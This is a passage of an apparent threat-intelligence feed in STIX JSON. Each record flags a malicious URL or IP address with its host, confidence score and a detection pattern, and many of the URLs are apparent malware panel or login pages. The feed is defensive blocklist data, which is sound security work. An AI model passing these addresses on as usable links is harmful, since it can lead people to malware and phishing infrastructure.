'http://q74722vp.beget.tech/login']","type":"indicator","valid_from":"2020-02-01T02:11:41.88Z"} +{"created":"2020-02-02T01:57:18.343Z","description":"TS ID: 55280666668; iType: mal_url; State: active; Org: Limited liability company Mail.Ru; Source: CyberCrime","id":"indicator--194d8979-3fb6-4ebb-b7b1-d4758be6b32a","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-85"],"modified":"2020-02-02T01:57:18.343Z","name":"mal_url: http://sino-spriulina.com/demo1/Panel/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://sino-spriulina.com/demo1/Panel/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-02T01:57:18.343Z"} +{"created":"2020-02-02T01:57:18.366Z","description":"TS ID: 55280666642; iType: mal_url; State: active; Org: State Research Center of the Russian Federation; Source: CyberCrime","id":"indicator--7470705a-310f-4fe9-9c2f-02b5eac2ff94","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-88"],"modified":"2020-02-02T01:57:18.366Z","name":"mal_url: http://gpi-q.com/craks/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://gpi-q.com/craks/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-02T01:57:18.366Z"} +{"created":"2020-02-02T01:57:18.451Z","description":"TS ID: 55280666607; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--20860e18-16e7-4a9a-a485-7588aaee909b","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-87"],"modified":"2020-02-02T01:57:18.451Z","name":"mal_url: http://calmingvapors.com/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://calmingvapors.com/login']","type":"indicator","valid_from":"2020-02-02T01:57:18.451Z"} +{"created":"2020-02-02T01:57:18.605Z","description":"TS ID: 55280666626; iType: mal_url; State: active; Org: Alibaba; Source: CyberCrime","id":"indicator--6d90d2cb-9fc8-43a4-b4c0-d9ab027f2268","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-87"],"modified":"2020-02-02T01:57:18.605Z","name":"mal_url: http://tonitrus.pw/3AX3AsO58eVAwtrm/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://tonitrus.pw/3AX3AsO58eVAwtrm/login.php']","type":"indicator","valid_from":"2020-02-02T01:57:18.605Z"} +{"created":"2020-02-02T01:57:19.047Z","description":"TS ID: 55280666671; iType: mal_url; State: active; Org: Limited liability company Mail.Ru; Source: CyberCrime","id":"indicator--ffc26af5-40e7-4157-9d15-cf6048ef86a4","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-85"],"modified":"2020-02-02T01:57:19.047Z","name":"mal_url: http://sino-spriulina.com/demo/Panel/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://sino-spriulina.com/demo/Panel/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-02T01:57:19.047Z"} +{"created":"2020-02-02T01:57:19.068Z","description":"TS ID: 55280666596; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime","id":"indicator--5c4cfe56-5fda-4c2b-9b8c-3d384988c3ac","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-71"],"modified":"2020-02-02T01:57:19.068Z","name":"mal_url: http://f0392879.xsph.ru/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://f0392879.xsph.ru/login']","type":"indicator","valid_from":"2020-02-02T01:57:19.068Z"} +{"created":"2020-02-02T01:57:25.701Z","description":"TS ID: 55280666633; iType: mal_url; State: active; Org: Limited liability company Mail.Ru; Source: CyberCrime","id":"indicator--8fdc4cfc-1312-4f6c-99ce-3a0a582a07d3","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-80"],"modified":"2020-02-02T01:57:25.701Z","name":"mal_url: http://expertisem.net/agutaz/direct/pushin/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://expertisem.net/agutaz/direct/pushin/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-02T01:57:25.701Z"} +{"created":"2020-02-02T01:57:25.838Z","description":"TS ID: 55280666656; iType: mal_url; State: active; Org: State Research Center of the Russian Federation; Source: CyberCrime","id":"indicator--9d8a164e-4f04-4ad2-a1a5-9c4dea319b97","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-88"],"modified":"2020-02-02T01:57:25.838Z","name":"mal_url: http://gpi-q.com/copy/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://gpi-q.com/copy/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-02T01:57:25.838Z"} +{"created":"2020-02-02T01:57:29.827Z","description":"TS ID: 55280666597; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime","id":"indicator--001b0157-c446-40fd-8e01-136a2cab433f","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-65"],"modified":"2020-02-02T01:57:29.827Z","name":"mal_url: http://f0391832.xsph.ru/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://f0391832.xsph.ru/login']","type":"indicator","valid_from":"2020-02-02T01:57:29.827Z"} +{"created":"2020-02-02T01:57:48.75Z","description":"TS ID: 55280666598; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime","id":"indicator--4c7c0429-b6f8-4376-8d84-18d68d212b34","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-73"],"modified":"2020-02-02T01:57:48.75Z","name":"mal_url: http://f0391281.xsph.ru/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://f0391281.xsph.ru/login']","type":"indicator","valid_from":"2020-02-02T01:57:48.75Z"} +{"created":"2020-02-02T01:58:23.948Z","description":"TS ID: 55280666593; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime","id":"indicator--4eeed5f1-092b-4a3f-8c54-f5eb87b5a19c","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-71"],"modified":"2020-02-02T01:58:23.948Z","name":"mal_url: http://f0393735.xsph.ru/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://f0393735.xsph.ru/login']","type":"indicator","valid_from":"2020-02-02T01:58:23.948Z"} +{"created":"2020-02-02T01:58:44.041Z","description":"TS ID: 55280666689; iType: mal_url; State: active; Org: Hostinger International Limited; Source: CyberCrime","id":"indicator--c253cabd-5a52-4b5f-a53f-94ca58ee3f60","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-94"],"modified":"2020-02-02T01:58:44.041Z","name":"mal_url: http://gerawest.xyz/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://gerawest.xyz/login.php']","type":"indicator","valid_from":"2020-02-02T01:58:44.041Z"} +{"created":"2020-02-02T01:58:54.099Z","description":"TS ID: 55280666701; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime","id":"indicator--0bb2320f-9a03-4375-ad2a-10b5d3c41b36","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-73"],"modified":"2020-02-02T01:58:54.099Z","name":"mal_url: http://f0387404.xsph.ru/","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://f0387404.xsph.ru/']","type":"indicator","valid_from":"2020-02-02T01:58:54.099Z"} +{"created":"2020-02-02T01:59:11.446Z","description":"TS ID: 55280666697; iType: mal_url; State: active; Org: Avguro Technologies Ltd. Hosting service provider; Source: CyberCrime","id":"indicator--f6198f5d-4056-4b4f-8ab7-d9b82ec4878b","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-67"],"modified":"2020-02-02T01:59:11.446Z","name":"mal_url: http://j1040794.myjino.ru/","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://j1040794.myjino.ru/']","type":"indicator","valid_from":"2020-02-02T01:59:11.446Z"} +{"created":"2020-02-02T01:59:24.665Z","description":"TS ID: 55280666589; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime","id":"indicator--60d7cde7-6852-4295-8399-81b21cc74d7a","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-62"],"modified":"2020-02-02T01:59:24.665Z","name":"mal_url: http://f0395171.xsph.ru/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://f0395171.xsph.ru/login']","type":"indicator","valid_from":"2020-02-02T01:59:24.665Z"} +{"created":"2020-02-02T02:00:11.839Z","description":"TS ID: 55280666629; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime","id":"indicator--f31af3ce-1dfe-4846-8f78-cc0f5e73dd2f","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-83"],"modified":"2020-02-02T02:00:11.839Z","name":"mal_url: http://5.188.60.203/yvE9cDkW1l7pXwt5/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://5.188.60.203/yvE9cDkW1l7pXwt5/login.php']","type":"indicator","valid_from":"2020-02-02T02:00:11.839Z"} +{"created":"2020-02-02T02:00:15.667Z","description":"TS ID: 55280666662; iType: mal_url; State: active; Org: Limited liability company Mail.Ru; Source: CyberCrime","id":"indicator--f6bd5b3a-7b17-4b33-a487-1d47f9ffa62b","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-74"],"modified":"2020-02-02T02:00:15.667Z","name":"mal_url: http://nortonlilly.info/boss/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://nortonlilly.info/boss/login.php']","type":"indicator","valid_from":"2020-02-02T02:00:15.667Z"} +{"created":"2020-02-02T02:00:31.866Z","description":"TS ID: 55280666667; iType: mal_url; State: active; Org: Avguro Technologies Ltd. Hosting service provider; Source: CyberCrime","id":"indicator--bc1481fa-a858-4a87-9ef6-8844ace2dbed","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-67"],"modified":"2020-02-02T02:00:31.866Z","name":"mal_url: http://ildar-mael-ru.myjino.ru/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://ildar-mael-ru.myjino.ru/login']","type":"indicator","valid_from":"2020-02-02T02:00:31.866Z"} +{"created":"2020-02-02T02:00:31.895Z","description":"TS ID: 55280666659; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--e441cd63-5660-465f-a299-b035d8276ff6","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-86"],"modified":"2020-02-02T02:00:31.895Z","name":"mal_url: http://butland.cf/sabali/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://butland.cf/sabali/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-02T02:00:31.895Z"} +{"created":"2020-02-02T02:00:38.587Z","description":"TS ID: 55280666644; iType: mal_ip; State: active; Source: CyberCrime","id":"indicator--f83c3853-4de3-4139-8076-a598265f453c","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-54"],"modified":"2020-02-02T02:00:38.587Z","name":"mal_ip: 85.117.234.217","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '85.117.234.217']","type":"indicator","valid_from":"2020-02-02T02:00:38.587Z"} +{"created":"2020-02-02T02:00:38.657Z","description":"TS ID: 55280666595; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime","id":"indicator--374e400c-0db7-4e0d-b533-5b6653178da0","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-71"],"modified":"2020-02-02T02:00:38.657Z","name":"mal_url: http://f0393257.xsph.ru/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://f0393257.xsph.ru/login']","type":"indicator","valid_from":"2020-02-02T02:00:38.657Z"} +{"created":"2020-02-02T02:00:44.275Z","description":"TS ID: 55280666609; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--6a115b32-72cb-4397-9550-28bd809ff522","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-83"],"modified":"2020-02-02T02:00:44.275Z","name":"mal_url: http://amotach-cn.com/DOTNETXXX/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://amotach-cn.com/DOTNETXXX/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-02T02:00:44.275Z"} +{"created":"2020-02-02T02:01:03.981Z","description":"TS ID: 55280666694; iType: mal_ip; State: active; Org: Hostinger International Limited; Source: CyberCrime","id":"indicator--7c6e0ed1-51a4-460c-a69a-75ce73db8961","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-52"],"modified":"2020-02-02T02:01:03.981Z","name":"mal_ip: 46.17.175.204","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '46.17.175.204']","type":"indicator","valid_from":"2020-02-02T02:01:03.981Z"} +{"created":"2020-02-02T02:01:09.238Z","description":"TS ID: 55280666627; iType: mal_ip; State: active; Org: Alibaba; Source: CyberCrime","id":"indicator--c5225c57-2cfd-4cd4-873a-068d5577959e","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-83"],"modified":"2020-02-02T02:01:09.238Z","name":"mal_ip: 47.90.215.148","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '47.90.215.148']","type":"indicator","valid_from":"2020-02-02T02:01:09.238Z"} +{"created":"2020-02-03T01:56:22.888Z","description":"TS ID: 55283402087; iType: mal_ip; State: active; Org: Com Telecom; Source: CyberCrime","id":"indicator--30cc7535-c071-4164-89a2-f9fe308cbe2c","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-82"],"modified":"2020-02-03T01:56:22.888Z","name":"mal_ip: 176.107.160.116","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '176.107.160.116']","type":"indicator","valid_from":"2020-02-03T01:56:22.888Z"} +{"created":"2020-02-03T01:56:30.815Z","description":"TS ID: 55283402093; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--16fe8840-e1d7-4e71-acd8-d727ed7baa09","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-87"],"modified":"2020-02-03T01:56:30.815Z","name":"mal_url: http://mine.kommanditgesel.icu/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://mine.kommanditgesel.icu/login']","type":"indicator","valid_from":"2020-02-03T01:56:30.815Z"} +{"created":"2020-02-03T01:56:31.691Z","description":"TS ID: 55283402090; iType: mal_url; State: active; Org: YHC Corporation; Source: CyberCrime","id":"indicator--c091ca15-bd83-4318-b0f0-1c322baa7a7a","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-86"],"modified":"2020-02-03T01:56:31.691Z","name":"mal_url: http://soapstampingmachines.com/slider/data1/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://soapstampingmachines.com/slider/data1/panel/admin.php']","type":"indicator","valid_from":"2020-02-03T01:56:31.691Z"} +{"created":"2020-02-03T01:56:34.945Z","description":"TS ID: 55283402094; iType: mal_url; State: active; Org: Avguro Technologies Ltd. Hosting service provider; Source: CyberCrime","id":"indicator--d68559f0-f20c-40bb-ab62-c2f80c83c80f","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-86"],"modified":"2020-02-03T01:56:34.945Z","name":"mal_url: http://jino-stell-jino.myjino.ru/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://jino-stell-jino.myjino.ru/login']","type":"indicator","valid_from":"2020-02-03T01:56:34.945Z"} +{"created":"2020-02-03T01:57:32.61Z","description":"TS ID: 55283402104; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime","id":"indicator--ba8f8e26-04b9-460b-b1f4-cf0b2d85db94","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-82"],"modified":"2020-02-03T01:57:32.61Z","name":"mal_url: http://5.188.60.58/auth.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://5.188.60.58/auth.php']","type":"indicator","valid_from":"2020-02-03T01:57:32.61Z"} +{"created":"2020-02-03T01:57:46.702Z","description":"TS ID: 55283402092; iType: mal_ip; State: active; Org: IT DeLuxe Ltd.; Source: CyberCrime","id":"indicator--571838b6-5834-4cb9-a1eb-34f535483f4f","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-56"],"modified":"2020-02-03T01:57:46.702Z","name":"mal_ip: 92.63.197.191","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '92.63.197.191']","type":"indicator","valid_from":"2020-02-03T01:57:46.702Z"} +{"created":"2020-02-03T01:58:15.744Z","description":"TS ID: 55283402101; iType: mal_url; State: active; Org: DDoS-GUARD GmbH; Source: CyberCrime","id":"indicator--336d902d-e5d8-48c1-87be-c4f506274d34","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-94"],"modified":"2020-02-03T01:58:15.744Z","name":"mal_url: http://hypercleaner.su/auth.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://hypercleaner.su/auth.php']","type":"indicator","valid_from":"2020-02-03T01:58:15.744Z"} +{"created":"2020-02-03T01:58:28.73Z","description":"TS ID: 55283402095; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--cae5efb7-ff91-4a8d-bf28-21ffff0e4994","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-83"],"modified":"2020-02-03T01:58:28.73Z","name":"mal_url: http://pnny.kommanditgesel.icu/news/plast/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://pnny.kommanditgesel.icu/news/plast/admin.php']","type":"indicator","valid_from":"2020-02-03T01:58:28.73Z"} +{"created":"2020-02-03T01:59:18.132Z","description":"TS ID: 55283402096; iType: mal_url; State: active; Org: PT Master Web Network; Source: CyberCrime","id":"indicator--1644ebf0-46d0-4dcc-8e04-3a58376cc625","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-58"],"modified":"2020-02-03T01:59:18.132Z","name":"mal_url: http://pa-buol.go.id/wp/panelnew/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://pa-buol.go.id/wp/panelnew/admin.php']","type":"indicator","valid_from":"2020-02-03T01:59:18.132Z"} +{"created":"2020-02-03T01:59:28.343Z","description":"TS ID: 55283402103; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime","id":"indicator--a6588ee7-309e-49de-9884-faa2bdd702d2","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-62"],"modified":"2020-02-03T01:59:28.343Z","name":"mal_url: http://5.188.60.59/auth.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://5.188.60.59/auth.php']","type":"indicator","valid_from":"2020-02-03T01:59:28.343Z"} +{"created":"2020-02-03T01:59:33.587Z","description":"TS ID: 55283402100; iType: mal_url; State: active; Org: Com Telecom; Source: CyberCrime","id":"indicator--8d5e44f6-7283-40f8-b9b3-2c4791832c4e","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-84"],"modified":"2020-02-03T01:59:33.587Z","name":"mal_url: http://anorelier.hk/fshblfn8071/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://anorelier.hk/fshblfn8071/admin.php']","type":"indicator","valid_from":"2020-02-03T01:59:33.587Z"} +{"created":"2020-02-03T01:59:54.52Z","description":"TS ID: 55283402099; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--f33dd90a-b849-42af-9bcb-f60476358305","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-95"],"modified":"2020-02-03T01:59:54.52Z","name":"mal_url: http://bendetta.online/mangooste/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://bendetta.online/mangooste/admin.php']","type":"indicator","valid_from":"2020-02-03T01:59:54.52Z"} +{"created":"2020-02-03T01:59:54.544Z","description":"TS ID: 55283402097; iType: mal_url; State: active; Org: Relink LTD; Source: CyberCrime","id":"indicator--27f2f598-95d6-4e35-a42e-240093d4452d","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-87"],"modified":"2020-02-03T01:59:54.544Z","name":"mal_url: http://kayfundz.ru/kay/eng/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://kayfundz.ru/kay/eng/admin.php']","type":"indicator","valid_from":"2020-02-03T01:59:54.544Z"} +{"created":"2020-02-05T01:58:09.73Z","description":"TS ID: 55287965572; iType: mal_url; State: active; Org: Limited liability company Mail.Ru; Source: CyberCrime","id":"indicator--65a8989b-25c3-498e-8247-0514d5aa719e","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-74"],"modified":"2020-02-05T01:58:09.73Z","name":"mal_url: http://unrrwa.org/rich/Panel/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://unrrwa.org/rich/Panel/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-05T01:58:09.73Z"} +{"created":"2020-02-05T01:58:17.365Z","description":"TS ID: 55287965584; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--e531a668-ef25-4b16-aa50-1b0b8f0f901e","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-72"],"modified":"2020-02-05T01:58:17.365Z","name":"mal_url: http://193.142.59.7/hoist3/logs/omc.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://193.142.59.7/hoist3/logs/omc.php']","type":"indicator","valid_from":"2020-02-05T01:58:17.365Z"} +{"created":"2020-02-05T01:58:17.428Z","description":"TS ID: 55287965574; iType: mal_ip; State: active; Org: LLC Baxet; Source: CyberCrime","id":"indicator--7aed3145-aab6-470d-bb4f-592d86654719","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-66"],"modified":"2020-02-05T01:58:17.428Z","name":"mal_ip: 46.29.161.60","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '46.29.161.60']","type":"indicator","valid_from":"2020-02-05T01:58:17.428Z"} +{"created":"2020-02-05T01:58:31.683Z","description":"TS ID: 55287965571; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--af8e5326-c1d4-4f9e-8f47-ee23c6a2606a","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-94"],"modified":"2020-02-05T01:58:31.683Z","name":"mal_url: http://xigkxc.xyz/Atoz/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://xigkxc.xyz/Atoz/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-05T01:58:31.683Z"} +{"created":"2020-02-05T01:58:31.704Z","description":"TS ID: 55287965557; iType: mal_url; State: active; Org: 1&1 Internet AG; Source: CyberCrime","id":"indicator--59c28566-62b0-4102-ad17-53ec3a143144","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-81"],"modified":"2020-02-05T01:58:31.704Z","name":"mal_url: http://217.160.59.64/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://217.160.59.64/panel/admin.php']","type":"indicator","valid_from":"2020-02-05T01:58:31.704Z"} +{"created":"2020-02-05T01:58:32.111Z","description":"TS ID: 55287965585; iType: mal_url; State: active; Org: Global Frag Networks; Source: CyberCrime","id":"indicator--56524b03-3217-40a0-9180-dc8262b3b6f9","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-83"],"modified":"2020-02-05T01:58:32.111Z","name":"mal_url: http://104.223.170.113/Silkop/Panel/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://104.223.170.113/Silkop/Panel/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-05T01:58:32.111Z"} +{"created":"2020-02-05T01:58:32.145Z","description":"TS ID: 55287965577; iType: mal_url; State: active; Org: Limited liability company Mail.Ru; Source: CyberCrime","id":"indicator--69661075-e6cb-4054-820c-61954757f0ba","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-84"],"modified":"2020-02-05T01:58:32.145Z","name":"mal_url: http://plosss.com/lok/Panel/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://plosss.com/lok/Panel/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-05T01:58:32.145Z"} +{"created":"2020-02-05T01:58:34.795Z","description":"TS ID: 55287965581; iType: mal_url; State: active; Org: Domain names registrar REG.RU, Ltd; Source: CyberCrime","id":"indicator--5be6be50-c2ef-4502-857e-f69dd17d37a9","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-82"],"modified":"2020-02-05T01:58:34.795Z","name":"mal_url: http://everest--sh.com/coco/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://everest--sh.com/coco/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-05T01:58:34.795Z"} +{"created":"2020-02-05T01:58:34.836Z","description":"TS ID: 55287965567; iType: mal_url; State: active; Org: Alibaba; Source: CyberCrime","id":"indicator--7de3f68d-51ed-43c0-b5d9-c63d621aa99f","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-82"],"modified":"2020-02-05T01:58:34.836Z","name":"mal_url: http://domainmanagerz.net/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://domainmanagerz.net/login']","type":"indicator","valid_from":"2020-02-05T01:58:34.836Z"} +{"created":"2020-02-05T01:58:41.381Z","description":"TS ID: 55287965564; iType: mal_url; State: active; Org: A2 Hosting; Source: CyberCrime","id":"indicator--08ec347d-3d22-45e6-96fc-3fc3bb37c720","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-52"],"modified":"2020-02-05T01:58:41.381Z","name":"mal_url: http://groupbizconsulting.com/p3/webpanel/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://groupbizconsulting.com/p3/webpanel/login.php']","type":"indicator","valid_from":"2020-02-05T01:58:41.381Z"} +{"created":"2020-02-05T01:58:59.279Z","description":"TS ID: 55287965569; iType: mal_url; State: active; Org: Limited liability company Mail.Ru; Source: CyberCrime","id":"indicator--b845a78e-d141-455e-92ff-df401787a3cd","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-83"],"modified":"2020-02-05T01:58:59.279Z","name":"mal_url: http://samundarmarine.com/denty/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://samundarmarine.com/denty/admin.php']","type":"indicator","valid_from":"2020-02-05T01:58:59.279Z"} +{"created":"2020-02-05T01:59:03.426Z","description":"TS ID: 55287965563; iType: mal_url; State: active; Org: A2 Hosting; Source: CyberCrime","id":"indicator--e9d4f82a-bc23-4f9a-81e0-05097acc6daa","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-52"],"modified":"2020-02-05T01:59:03.426Z","name":"mal_url: 